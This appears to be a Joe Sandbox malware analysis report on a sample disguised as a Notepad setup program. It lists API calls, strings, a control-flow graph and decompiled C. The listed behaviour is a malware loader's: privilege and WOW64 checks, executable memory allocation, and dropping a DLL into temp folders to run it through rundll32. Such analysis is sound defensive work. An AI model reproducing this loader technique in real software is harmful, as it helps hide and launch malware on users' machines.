                                        • Part of subcall function 006F04ED: WSAGetLastError.WS2_32(?,?,006F04B2,17E80870,006F16C7,00000000,00000010,00000000,?,?,?,006F043E,006F16C7,00000002,006F16C7,00000010), ref: 006F0513
                                      • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,006F043E,006F16C7,00000002,006F16C7,00000010,006F16C7,006F1744), ref: 006F047F
                                      • GetLastError.KERNEL32(?,?,?,006F043E,006F16C7,00000002,006F16C7,00000010,006F16C7,006F1744), ref: 006F0489
                                      • closesocket.WS2_32(00000000), ref: 006F049B
                                      • bind.WS2_32(50A5A5A5,006F16C7,00000002), ref: 006F04C2
                                      • WSAGetLastError.WS2_32(?,?,?,006F043E,006F16C7,00000002,006F16C7,00000010,006F16C7,006F1744), ref: 006F04CD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$HandleInformationbindclosesocketioctlsocketsocket
                                      • String ID:
                                      • API String ID: 2417539845-0
                                      • Opcode ID: 8ecc149f90778662164361e6c9b416a8e501cbb388ac49197ab5d80a6899b70c
                                      • Instruction ID: acbf74e5c9fded0e20bce3e4dfc5a789f2bb306d116439e6377081da897a99ea
                                      • Opcode Fuzzy Hash: 8ecc149f90778662164361e6c9b416a8e501cbb388ac49197ab5d80a6899b70c
                                      • Instruction Fuzzy Hash: E1119D31104A0AEBEB211F75EC09BBA7BA7AF42731F108629FB66841F1DB319811DB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E5F12 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36librarynativeloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 006E5F21
                                      • GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess), ref: 006E5F2D
                                      • GetCurrentProcess.KERNEL32(00000022,00000000,00000004,?), ref: 006E5F45
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 006E5F4C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleInformationModuleProcQuery
                                      • String ID: ZwQueryInformationProcess$ntdll.dll
                                      • API String ID: 2292878059-132032222
                                      • Opcode ID: 43bf67666af5feb5001cd1859887bdff0e68ac932085d87fc730018010ceec9f
                                      • Instruction ID: 08b555fd3255f8ee2c0215a0cf04f4fbf636ad5c97a4a77fa8e720bf5aaf044c
                                      • Opcode Fuzzy Hash: 43bf67666af5feb5001cd1859887bdff0e68ac932085d87fc730018010ceec9f
                                      • Instruction Fuzzy Hash: 53F09072952759BBD7109B91CC0AFEEB77E9B04709F000005FA02A2280C6749A40CEA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E0300 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LdrInitializeThunk.NTDLL(006E9043,?,?,00001000,00000040,00000000), ref: 006E030A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 386589ac558fb0256981670f6991e750c65251fba2176266621c431f93f0b06c
                                      • Instruction ID: a9014f36a0bb7a2f37bdbf87fac2d9bbc5c011efe5c846a6c97edb4d19d120db
                                      • Opcode Fuzzy Hash: 386589ac558fb0256981670f6991e750c65251fba2176266621c431f93f0b06c
                                      • Instruction Fuzzy Hash: B39002B124140412D1006559882470B010657E0356F66C011A2154665DCA65886675F1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E2B92 Relevance: 163.5, APIs: 73, Strings: 20, Instructions: 785stringmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 6e2b92-6e2bb3 calloc 1 6e3598-6e359c 0->1 2 6e2bb9-6e2bcf call 6e6512 call 6e359d 0->2 7 6e2cec-6e2d3b memset time srand calloc 2->7 8 6e2bd5-6e2be6 call 6e403a 2->8 9 6e2dfb 7->9 10 6e2d41-6e2d65 call 6e64be strlen call 6e8013 7->10 8->7 18 6e2bec-6e2c05 call 6e2975 8->18 13 6e2dfe-6e2e0a 9->13 26 6e2de6-6e2df9 call 6e64d1 ??3@YAXPAX@Z 10->26 27 6e2d67-6e2de3 call 6ef51e call 6ef885 call 6ef8f0 call 6ef5ba 10->27 16 6e2e0c-6e2e14 13->16 17 6e2e17-6e2e22 ??3@YAXPAX@Z 13->17 16->17 17->1 21 6e2e28-6e2e40 GetCurrentProcess OpenProcessToken 17->21 18->7 28 6e2c0b-6e2c0f 18->28 24 6e2e9d-6e2ea4 call 6e359d 21->24 25 6e2e42-6e2e75 memset call 6e415d 21->25 43 6e2eaa-6e2ebc call 6e35f2 24->43 44 6e2f98-6e2fb1 call 6ec89b call 6e403a 24->44 40 6e2e77-6e2e8b lstrcmpiW 25->40 41 6e2e94-6e2e97 CloseHandle 25->41 26->13 27->26 32 6e2c82-6e2c8d ??3@YAXPAX@Z 28->32 33 6e2c11-6e2c16 28->33 32->7 42 6e2c8f-6e2cae call 6e2cb3 32->42 33->32 39 6e2c18-6e2c2e VirtualAlloc 33->39 39->32 47 6e2c30-6e2c4c memcpy 39->47 40->41 49 6e2e8d 40->49 41->24 42->7 56 6e358e-6e3597 ??3@YAXPAX@Z 43->56 57 6e2ec2-6e2ed5 calloc 43->57 44->56 66 6e2fb7-6e2fd9 call 6e64be call 6e2975 44->66 53 6e2c4e-6e2c77 memcpy 47->53 54 6e2c79-6e2c7f 47->54 49->41 53->53 53->54 54->32 56->1 57->56 60 6e2edb-6e2f6a memcpy * 3 strlen 57->60 63 6e2f6c 60->63 64 6e2f70-6e2f93 ??3@YAXPAX@Z 60->64 63->64 72 6e358d 64->72 74 6e2fdf-6e3002 call 6e3f27 CreateFileMappingW 66->74 75 6e357a-6e358c call 6e64d1 ??3@YAXPAX@Z 66->75 72->56 80 6e356a GetLastError 74->80 81 6e3008-6e3023 call 6e6512 MapViewOfFile 74->81 75->72 82 6e3570-6e3579 ??3@YAXPAX@Z 80->82 85 6e3559 GetLastError 81->85 86 6e3029-6e309f strlen memcpy * 3 strcpy 81->86 82->75 87 6e355f-6e3568 CloseHandle 85->87 88 6e30a5-6e316d UnmapViewOfFile call 6e5c88 * 8 lstrcpyW call 6e651b * 2 86->88 89 6e30a1 86->89 87->82 88->87 110 6e3173-6e31bb call 6e651b call 6e57d5 call 6e2975 88->110 89->88 110->87 117 6e31c1-6e31eb call 6e651b * 2 110->117 122 6e3381-6e33b3 GetTickCount _snwprintf ExpandEnvironmentStringsW 117->122 123 6e31f1-6e3223 GetTickCount _snwprintf ExpandEnvironmentStringsW 117->123 124 6e354d-6e3557 ??3@YAXPAX@Z 122->124 126 6e33b9-6e33d3 CreateFileW 122->126 123->124 125 6e3229-6e3243 CreateFileW 123->125 124->87 125->124 128 6e3249-6e3270 WriteFile CloseHandle 125->128 126->124 127 6e33d9-6e3400 WriteFile FindCloseChangeNotification 126->127 127->124 129 6e3406-6e3409 127->129 128->124 130 6e3276-6e3279 128->130 129->124 131 6e340f-6e3440 _snwprintf call 6e3d9d 129->131 130->124 132 6e327f-6e32b0 _snwprintf call 6e3d9d 130->132 131->124 138 6e3446-6e345f GetModuleHandleA 131->138 132->124 137 6e32b6-6e32cf GetModuleHandleA 132->137 139 6e32de-6e32e4 137->139 140 6e32d1-6e32d9 GetProcAddress 137->140 141 6e346e-6e3474 138->141 142 6e3461-6e3469 GetProcAddress 138->142 143 6e32e6-6e32ee GetProcAddress 139->143 144 6e32f3-6e32fa 139->144 140->139 145 6e3476-6e347e GetProcAddress 141->145 146 6e3483-6e348a 141->146 142->141 143->144 147 6e32fc-6e32ff 144->147 148 6e3302-6e3317 ExpandEnvironmentStringsW 144->148 145->146 149 6e348c-6e348f 146->149 150 6e3492-6e34a8 ExpandEnvironmentStringsW 146->150 147->148 151 6e336c-6e3373 148->151 152 6e3319-6e334c GetStartupInfoW CreateProcessW 148->152 149->150 153 6e34ae-6e34b1 150->153 154 6e353f-6e3546 150->154 151->124 156 6e3379-6e337c 151->156 152->151 155 6e334e-6e336a WaitForSingleObject CloseHandle * 2 152->155 157 6e34ee-6e351f GetStartupInfoW CreateProcessW 153->157 158 6e34b3-6e34c6 CoInitialize call 6e3f5f 153->158 154->124 159 6e3548 154->159 155->151 161 6e354b 156->161 157->154 160 6e3521-6e353d WaitForSingleObject CloseHandle * 2 157->160 164 6e34cf call 6e6f32 158->164 165 6e34c8-6e34cd call 6e6977 158->165 159->161 160->154 161->124 169 6e34d4-6e34d9 164->169 165->169 170 6e34db-6e34e0 Sleep 169->170 171 6e34e6-6e34ec 169->171 170->171 171->154
                                      APIs
                                      • calloc.MSVCRT ref: 006E2BA5
                                        • Part of subcall function 006E359D: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,006E2BCD), ref: 006E35B3
                                        • Part of subcall function 006E359D: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E35BF
                                        • Part of subcall function 006E359D: GetCurrentProcess.KERNEL32(00000000,00000000,?,006E2BCD), ref: 006E35D2
                                        • Part of subcall function 006E359D: IsWow64Process.KERNEL32(00000000,?,006E2BCD), ref: 006E35D9
                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006E2C23
                                      • memcpy.NTDLL(00000000,00000000,?), ref: 006E2C3D
                                      • memcpy.NTDLL(?,?,?), ref: 006E2C60
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E2C83
                                      • memset.NTDLL ref: 006E2CF3
                                      • time.MSVCRT ref: 006E2D1C
                                      • srand.MSVCRT ref: 006E2D23
                                      • calloc.MSVCRT ref: 006E2D2D
                                      • strlen.NTDLL ref: 006E2D50
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E2DF1
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E2E18
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 006E2E38
                                      • memset.NTDLL ref: 006E2E56
                                      • lstrcmpiW.KERNELBASE(?,SYSTEM), ref: 006E2E83
                                      • CloseHandle.KERNEL32(?), ref: 006E2E97
                                      • calloc.MSVCRT ref: 006E2EC9
                                      • memcpy.NTDLL(?,?,00000010), ref: 006E2F22
                                      • memcpy.NTDLL(?,006F2E24,00000040,?,?,00000010), ref: 006E2F35
                                      • memcpy.NTDLL(00000004,?,00000080,?,006F2E24,00000040,?,?,00000010), ref: 006E2F47
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E2F8D
                                      • strlen.NTDLL ref: 006E2F57
                                        • Part of subcall function 006E2975: strlen.NTDLL ref: 006E299D
                                      • GetCurrentProcess.KERNEL32(00000008,?), ref: 006E2E31
                                        • Part of subcall function 006E403A: malloc.MSVCRT ref: 006E4054
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E3591
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@memcpy$Process$callocstrlen$CurrentHandlememset$AddressAllocCloseModuleOpenProcTokenVirtualWow64lstrcmpimallocsrandtime
                                      • String ID: "%s",PrintUIEntry $%%APPDATA%%\nsis_uns%04x.dll$%%TEMP%%\nsis_uns%04x.dll$%Systemroot%\system32\rundll32.exe$8$GetProcessHeap$HeapAlloc$HeapFree$MapViewOfFile$OpenFileMappingW$SYSTEM$UnmapViewOfFile$VirtualAlloc$VirtualFree$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$dfdll.dll$kernel32.dll$prepare.bin$unhook.bin
                                      • API String ID: 2620314011-3193839693
                                      • Opcode ID: 251ce575476dfac41b68a2bfaf95b45a44a30a95e65fc2ee981e474873b2c105
                                      • Instruction ID: 1e570103d299980dd81158d7dffab59d65bb08fcc0cd2e86ca660e5f6749f411
                                      • Opcode Fuzzy Hash: 251ce575476dfac41b68a2bfaf95b45a44a30a95e65fc2ee981e474873b2c105
                                      • Instruction Fuzzy Hash: 60524CB1901359AFDB109FA6DC89AEEBBBAFF08304F104529F545A7391DB709A41CF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00408D90 Relevance: 37.4, APIs: 18, Strings: 3, Instructions: 637stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 30%
                                      			E00408D90(signed int __eax, signed int __ecx, signed int __edx, signed int _a4) {
				void* _v16;
				void _v32;
				signed int _v36;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int* _v72;
				signed char* _v76;
				int _v80;
				signed int _v84;
				signed int* _v88;
				signed int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				signed char _v101;
				signed int _v108;
				char _v112;
				intOrPtr _v116;
				int _v120;
				void* _t211;
				signed int _t212;
				signed int* _t213;
				signed int _t221;
				signed int _t223;
				signed int _t230;
				signed int _t232;
				int _t234;
				signed int _t235;
				signed int _t236;
				signed int _t239;
				intOrPtr* _t242;
				signed int _t245;
				void* _t250;
				intOrPtr _t263;
				signed int _t266;
				void* _t273;
				char* _t274;
				signed int _t275;
				intOrPtr _t276;
				void* _t280;
				void* _t281;
				int _t284;
				void* _t285;
				signed int _t288;
				char* _t292;
				signed int _t294;
				signed int _t300;
				signed int* _t309;
				signed int _t310;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int* _t317;
				signed char* _t319;
				signed int* _t320;
				signed int _t321;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				signed char* _t326;
				intOrPtr _t327;
				signed int _t332;
				signed char* _t334;
				signed int _t335;
				signed char* _t336;
				signed int _t338;
				signed char* _t339;
				signed int* _t340;
				signed char* _t344;
				signed char* _t346;
				signed int _t348;
				signed int _t349;
				signed int _t352;
				char* _t354;
				signed int _t355;
				signed int _t356;
				intOrPtr _t360;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int* _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				char* _t375;
				signed int _t376;
				signed int _t377;
				int _t379;
				signed int _t380;
				intOrPtr* _t381;
				signed int _t384;
				signed char* _t385;
				signed char* _t386;
				signed char* _t387;
				signed char* _t388;
				signed char* _t389;
				void* _t390;
				int _t392;
				signed char* _t393;
				intOrPtr _t394;
				void _t395;
				char* _t396;
				signed char* _t397;
				signed int _t399;
				signed int* _t400;
				signed int _t401;
				signed int* _t402;
				intOrPtr* _t404;
				intOrPtr* _t406;
				intOrPtr* _t407;
				intOrPtr* _t408;
				intOrPtr* _t409;

				_v64 = __eax;
				_v52 = __edx;
				_v60 = __ecx;
				if((__edx & 0x00000004) != 0) {
					_v76 = _t400;
					_t387 = __eax;
					 *_t400 = __eax;
					_t211 = E00408390(strlen(??) + 0x10 >> 4 << 4);
					_t315 =  *_t387 & 0x000000ff;
					_t401 = _t400 - _t211;
					__eflags = _t401;
					_t371 =  &_v112;
					_v72 = _t371;
					while(1) {
						_t37 =  &(_t387[1]); // -1
						_t326 = _t37;
						__eflags = _t315 - 0x7f;
						if(_t315 == 0x7f) {
							goto L22;
						}
						L19:
						__eflags = _t316 - 0x7b;
						if(_t316 == 0x7b) {
							_t315 = _t387[1] & 0x000000ff;
							_t344 = _t387;
							_v68 = _t387;
							_v48 = _t326;
							_t47 =  &(_t344[1]); // -1
							_t397 = _t47;
							_t338 = 1;
							_t212 = _t315;
							_v56 = 0x2c;
							__eflags = _t212 - 0x7b;
							if(__eflags == 0) {
								L34:
								_t212 = _t344[2] & 0x000000ff;
								_t338 = _t338 + 1;
								_t344 = _t397;
								L33:
								_t50 =  &(_t344[1]); // 0x1
								_t397 = _t50;
								__eflags = _t212 - 0x7b;
								if(__eflags == 0) {
									goto L34;
								}
							} else {
							}
							if(__eflags > 0) {
								__eflags = _t212 - 0x7d;
								if(_t212 != 0x7d) {
									__eflags = _t212 - 0x7f;
									if(_t212 != 0x7f) {
										goto L31;
									} else {
										_t212 = _t344[2] & 0x000000ff;
										__eflags = _t212;
										if(_t212 == 0) {
											goto L32;
										} else {
											_t75 =  &(_t344[2]); // 0x1
											_t212 = _t344[3] & 0x000000ff;
											_t344 = _t75;
										}
									}
									goto L33;
								} else {
									_t338 = _t338 - 1;
									__eflags = _t338;
									if(_t338 != 0) {
										goto L31;
									} else {
										__eflags = _v56 - 0x7b;
										_t399 = _v68;
										_t339 = _v48;
										if(_v56 != 0x7b) {
											goto L59;
										} else {
											_v48 = _t371;
											_t372 = _v52;
											while(1) {
												L39:
												_t309 = _v48;
												_t366 = 1;
												__eflags = _t315 - 0x7f;
												if(_t315 == 0x7f) {
													goto L56;
												}
												L41:
												_t399 = _t399 + 1;
												__eflags = _t399;
												_t340 = _t309;
												L42:
												__eflags = _t315 - 0x7d;
												if(_t315 == 0x7d) {
													_t366 = _t366 - 1;
													__eflags = _t366;
													if(_t366 == 0) {
														_t310 = _t399;
														goto L74;
													} else {
														 *_t340 = 0x7d;
														_t309 =  &(_t340[0]);
														goto L55;
													}
													goto L159;
												} else {
													__eflags = _t315 - 0x2c;
													if(_t315 != 0x2c) {
														L60:
														_t309 =  &(_t340[0]);
														__eflags = _t315 - 0x7b;
														if(_t315 != 0x7b) {
															 *_t340 = _t315;
															__eflags = _t315;
															if(_t315 != 0) {
																goto L55;
															} else {
																goto L68;
															}
														} else {
															 *_t340 = 0x7b;
															_t366 = _t366 + 1;
															L55:
															_t315 =  *(_t399 + 1) & 0x000000ff;
															__eflags = _t315 - 0x7f;
															if(_t315 != 0x7f) {
																goto L41;
															} else {
																goto L56;
															}
														}
														goto L159;
													} else {
														__eflags = _t366 - 1;
														if(_t366 != 1) {
															goto L60;
														} else {
															_t369 = _t399;
															_t324 = 1;
															while(1) {
																_t310 = _t369 + 1;
																_t370 =  *(_t369 + 1) & 0x000000ff;
																__eflags = _t370 - 0x7f;
																if(_t370 == 0x7f) {
																	goto L49;
																}
																L47:
																L69:
																__eflags = _t370 - 0x7b;
																if(_t370 == 0x7b) {
																	_t324 = _t324 + 1;
																	_t369 = _t310;
																	_t310 = _t369 + 1;
																	_t370 =  *(_t369 + 1) & 0x000000ff;
																	__eflags = _t370 - 0x7f;
																	if(_t370 == 0x7f) {
																		goto L49;
																	}
																	goto L51;
																} else {
																	__eflags = _t370 - 0x7d;
																	if(_t370 == 0x7d) {
																		_t324 = _t324 - 1;
																		__eflags = _t324;
																		if(_t324 == 0) {
																			L74:
																			_t311 = _t310 + 1;
																			__eflags = _t311;
																			do {
																				_t367 =  *_t311 & 0x000000ff;
																				_t340 =  &(_t340[0]);
																				_t311 = _t311 + 1;
																				 *(_t340 - 1) = _t367;
																				__eflags = _t367;
																			} while (_t367 != 0);
																			_t368 = _t372;
																			_t372 = _t372 | 0x00000001;
																			 *_t401 = _a4;
																			_t314 = E00408D90(_v72, _v60, _t368);
																			__eflags = _t314 - 1;
																			if(_t314 == 1) {
																				L68:
																				_v48 = 1;
																				goto L51;
																			} else {
																				__eflags =  *_t399 - 0x2c;
																				if( *_t399 != 0x2c) {
																					_v48 = _t314;
																					goto L51;
																				} else {
																					_t315 =  *(_t399 + 1) & 0x000000ff;
																					goto L39;
																				}
																			}
																		} else {
																			_t369 = _t310;
																			while(1) {
																				_t310 = _t369 + 1;
																				_t370 =  *(_t369 + 1) & 0x000000ff;
																				__eflags = _t370 - 0x7f;
																				if(_t370 == 0x7f) {
																					goto L49;
																				}
																				goto L47;
																			}
																		}
																	} else {
																		__eflags = _t370;
																		if(_t370 == 0) {
																			L50:
																			 *_t340 = 0;
																			_v48 = 1;
																			goto L51;
																		} else {
																			_t369 = _t310;
																			while(1) {
																				_t310 = _t369 + 1;
																				_t370 =  *(_t369 + 1) & 0x000000ff;
																				__eflags = _t370 - 0x7f;
																				if(_t370 == 0x7f) {
																					goto L49;
																				}
																				goto L47;
																				while(1) {
																					L49:
																					__eflags =  *(_t310 + 1);
																					if( *(_t310 + 1) == 0) {
																						goto L50;
																					}
																					_t370 =  *(_t310 + 2) & 0x000000ff;
																					_t310 = _t310 + 2;
																					__eflags = _t370 - 0x7f;
																					if(_t370 != 0x7f) {
																						goto L69;
																					} else {
																						continue;
																					}
																					goto L51;
																				}
																				goto L50;
																			}
																		}
																	}
																}
																goto L159;
															}
														}
													}
												}
												L51:
												goto L52;
												L56:
												_t323 =  *(_t399 + 2) & 0x000000ff;
												 *_t309 = 0x7f;
												_t340 =  &(_t309[0]);
												_t309[0] = _t323;
												__eflags = _t323;
												if(_t323 == 0) {
													_t309[0] = 0;
													goto L68;
												} else {
													_t315 =  *(_t399 + 3) & 0x000000ff;
													_t399 = _t399 + 3;
													goto L42;
												}
												goto L159;
											}
										}
									}
								}
							} else {
								__eflags = _t212;
								if(_t212 == 0) {
									_t339 = _v48;
									L59:
									 *_t371 = 0x7b;
									_t387 = _t339;
									_t371 =  &(_t371[0]);
									while(1) {
										_t37 =  &(_t387[1]); // -1
										_t326 = _t37;
										__eflags = _t315 - 0x7f;
										if(_t315 == 0x7f) {
											goto L22;
										}
										goto L19;
									}
								} else {
									__eflags = _t212 - 0x2c;
									if(_t212 != 0x2c) {
										L31:
										_t212 = _t344[2] & 0x000000ff;
										L32:
										_t344 = _t397;
									} else {
										__eflags = _t338 - 1;
										if(_t338 == 1) {
											_t212 = _t344[2] & 0x000000ff;
											_v56 = 0x7b;
											_t344 = _t397;
										} else {
											goto L31;
										}
									}
									goto L33;
								}
							}
						} else {
							L20:
							 *_t371 = _t316;
							_t213 =  &(_t371[0]);
							__eflags = _t316;
							if(_t316 == 0) {
								_t400 = _v76;
								goto L1;
							} else {
								_t316 = _t387[1] & 0x000000ff;
								_t387 = _t326;
								_t371 = _t213;
								_t40 =  &(_t387[1]); // 0x2
								_t326 = _t40;
								__eflags = _t316 - 0x7f;
								if(_t316 != 0x7f) {
									goto L19;
								} else {
									goto L22;
								}
							}
						}
						goto L159;
						L22:
						_t316 = _t387[1] & 0x000000ff;
						 *_t371 = 0x7f;
						__eflags = _t316;
						if(_t316 != 0) {
							_t371[0] = _t316;
							_t387 =  &(_t387[2]);
							_t315 =  *_t387 & 0x000000ff;
							_t371 =  &(_t371[0]);
							continue;
						} else {
							_t42 =  &(_t387[2]); // 0x2
							_t371 =  &(_t371[0]);
							_t387 = _t326;
							_t326 = _t42;
							goto L20;
						}
						goto L159;
					}
				} else {
					L1:
					_t373 = _v64;
					_v72 = _t400;
					 *_t400 = _t373;
					_t6 = strlen(??) + 1; // 0x1
					_t402 = _t400 - E00408390(_t214 + 0x10 >> 4 << 4);
					_v116 = _t6;
					_v120 = _t373;
					 *_t402 =  &_v112;
					 *_t402 = memcpy(??, ??, ??); // executed
					_t221 = E00409790(_t220); // executed
					_v32 = 0;
					_v68 = _t221;
					_t374 = _t221;
					_t223 = E00408D40( &_v44);
					_v48 = _t223;
					if(_t223 != 0) {
						L79:
						return _v48;
					} else {
						if(_t374 == 0 || E00408BF0(_t374, _v52) == 0) {
							_t388 = _v68;
							_t317 = _t402;
							 *_t402 = _t388;
							_t404 = _t402 - E00408390(strlen(??) + 0x10 >> 4 << 4);
							_t346 = _t388;
							_t375 =  &_v112;
							_t327 = _t375;
							while(1) {
								L6:
								_t230 =  *_t346 & 0x000000ff;
								_t389 =  &(_t346[1]);
								if(_t230 == 0x7f) {
									break;
								}
								_t327 = _t327 + 1;
								_t346 = _t389;
								 *(_t327 - 1) = _t230;
								__eflags = _t230;
								if(_t230 != 0) {
									continue;
								}
								L8:
								 *_t404 = _t375;
								L00408484();
								_v48 = 1;
								_t402 = _t317;
								if(_t230 == 0) {
									goto L79;
								} else {
									_v48 = E00408C90(_t230,  &_v44);
									goto L10;
								}
								goto L159;
							}
							_t230 = _t346[1] & 0x000000ff;
							_t327 = _t327 + 1;
							_t346 =  &(_t346[2]);
							 *(_t327 - 1) = _t230;
							if(_t230 != 0) {
								goto L6;
							}
							goto L8;
						} else {
							 *_t402 =  &_v44;
							_v48 = E00408D90(_v68, _v60, _v52 | 0x00000080);
							L10:
							if(_v48 != 0) {
								goto L79;
							} else {
								_t232 =  *(_v64 + 1) & 0x000000ff;
								if(_t232 == 0x2f || _t232 == 0x5c) {
									L85:
									 *_t402 = _v68;
									_t234 = strlen(??);
									_t376 = _v64;
									_t348 = _v64;
									_t319 = _t376 + _t234;
									_t235 =  *_t319 & 0x000000ff;
									__eflags = _t376 - _t319;
									if(_t376 >= _t319) {
										L90:
										__eflags = _t235 - 0x2f;
										if(_t235 == 0x2f) {
											goto L93;
										} else {
											__eflags = _t235 - 0x5c;
											if(_t235 == 0x5c) {
												goto L93;
											} else {
												_v101 = 0x5c;
											}
										}
									} else {
										while(1) {
											__eflags = _t235 - 0x2f;
											if(_t235 == 0x2f) {
												goto L93;
											}
											__eflags = _t235 - 0x5c;
											if(_t235 == 0x5c) {
												goto L90;
											} else {
												_t319 = _t319 - 1;
												_t235 =  *_t319 & 0x000000ff;
												__eflags = _t348 - _t319;
												if(_t348 != _t319) {
													continue;
												} else {
													goto L90;
												}
											}
											goto L96;
										}
										do {
											do {
												L93:
												_t319 =  &(_t319[1]);
												_t349 = _t235;
												_t235 =  *_t319 & 0x000000ff;
												__eflags = _t235 - 0x2f;
											} while (_t235 == 0x2f);
											__eflags = _t235 - 0x5c;
										} while (_t235 == 0x5c);
										_v101 = _t349;
									}
									goto L96;
								} else {
									_t292 = _v68;
									if( *_t292 != 0x2e ||  *((char*)(_t292 + 1)) != 0) {
										goto L85;
									} else {
										if((_v52 & 0x00000010) != 0) {
											_t385 = _v64;
											_t294 = E00408BF0(_t385, _v52);
											_v48 = _t294;
											__eflags = _t294;
											if(_t294 == 0) {
												 *_t402 = _t385;
												_t322 = _t402;
												_t409 = _t402 - E00408390(strlen(??) + 0x10 >> 4 << 4);
												_t336 = _t385;
												_t396 =  &_v112;
												_t360 = _t396;
												do {
													_t300 =  *_t336 & 0x000000ff;
													_t199 =  &(_t336[1]); // 0x1
													_t386 = _t199;
													__eflags = _t300 - 0x7f;
													if(_t300 != 0x7f) {
														_t336 = _t386;
													} else {
														_t300 = _t336[1] & 0x000000ff;
														_t336 =  &(_t336[2]);
													}
													_t360 = _t360 + 1;
													 *(_t360 - 1) = _t300;
													__eflags = _t300;
												} while (_t300 != 0);
												 *_t409 = _t396;
												L00408484();
												_t402 = _t322;
												__eflags = _t300;
												if(_t300 == 0) {
													goto L130;
												} else {
													__eflags = _a4;
													if(_a4 == 0) {
														goto L130;
													} else {
														E00408C90(_t300, _a4);
														_t377 = _v36;
													}
												}
											} else {
												_t319 = _v64;
												goto L16;
											}
										} else {
											L16:
											_v101 = 0x5c;
											_v68 = 0;
											L96:
											_t377 = _v36;
											_v48 = 2;
											_t236 =  *_t377;
											if(_t236 != 0) {
												_v76 = _t319;
												_t320 = _t377;
												_v64 = _v52 & 0x00008000;
												do {
													if(_v48 == 1) {
														L102:
														_v48 = 1;
													} else {
														 *_t402 = _t236;
														_t242 = E00409D60();
														_v56 = _t242;
														if(_t242 == 0) {
															__eflags = _v52 & 0x00000004;
															if((_v52 & 0x00000004) != 0) {
																goto L102;
															} else {
																_t380 = _v60;
																__eflags = _t380;
																if(_t380 != 0) {
																	L0040A388();
																	_v120 =  *_t242;
																	 *_t402 =  *_t320;
																	_t245 =  *_t380();
																	__eflags = _t245;
																	if(_t245 != 0) {
																		goto L102;
																	}
																}
															}
														} else {
															_v80 = 0;
															if(_v68 != 0) {
																 *_t402 =  *_t320;
																_v80 = strlen(??);
															}
															_v84 = 0;
															_v100 = _v80 + 2;
															while(1) {
																L109:
																 *_t402 = _v56;
																_t250 = E00409F60();
																_t390 = _t250;
																if(_t250 == 0) {
																	break;
																}
																if(_v64 == 0 ||  *((intOrPtr*)(_t390 + 8)) == 0x10) {
																	_t118 = _t390 + 0xc; // 0xc
																	_t379 = _t118;
																	if(E004089C0(_v76, _v52, _t379) != 0) {
																		continue;
																	} else {
																		_t332 =  *(_t390 + 6) & 0x0000ffff;
																		_v88 = _t402;
																		_t406 = _t402 - E00408390(_t332 + _v100 + 0xf >> 4 << 4);
																		_t352 =  &_v112;
																		_v92 = _t352;
																		_t263 = _t352;
																		if(_v80 != 0) {
																			_t392 = _v80;
																			_v108 = _t332;
																			 *_t406 = _t352;
																			_v116 = _t392;
																			_v120 =  *_t320;
																			_v96 = _t352;
																			memcpy(??, ??, ??);
																			_t266 =  *(_t406 + _t392 + 0xb) & 0x000000ff;
																			_t352 = _v96;
																			_t332 = _v108;
																			__eflags = _t266 - 0x2f;
																			if(_t266 == 0x2f) {
																				L147:
																				_t263 = _v80 + _t352;
																				goto L114;
																			} else {
																				__eflags = _t266 - 0x5c;
																				if(_t266 == 0x5c) {
																					goto L147;
																				} else {
